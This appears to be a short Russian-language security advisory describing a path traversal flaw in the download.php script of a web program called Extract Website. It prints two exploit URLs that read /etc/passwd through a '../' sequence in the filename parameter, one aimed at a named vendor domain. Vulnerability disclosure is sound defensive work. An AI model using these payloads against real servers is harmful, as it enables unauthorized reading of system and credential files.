Программа: Extract Website

Уязвимость позволяет удаленному злоумышленнику получить несанкционированный
доступ к конфиденциальной информации на целевой системе. Уязвимость существует
из-за ошибки в проверке входных данных сценарием download.php. Атакующий может
получить несанкционированный доступ к содержимому произвольных файлов на целевой
системе.

Эксплоит:

http://www.site.com/[path]/download.php?filename=../../../../../../../../etc/passwd
http://www.rightscripts.com/extractwebsite/download.php?filename=../../../../../../../../etc/passwd

Оставить мнение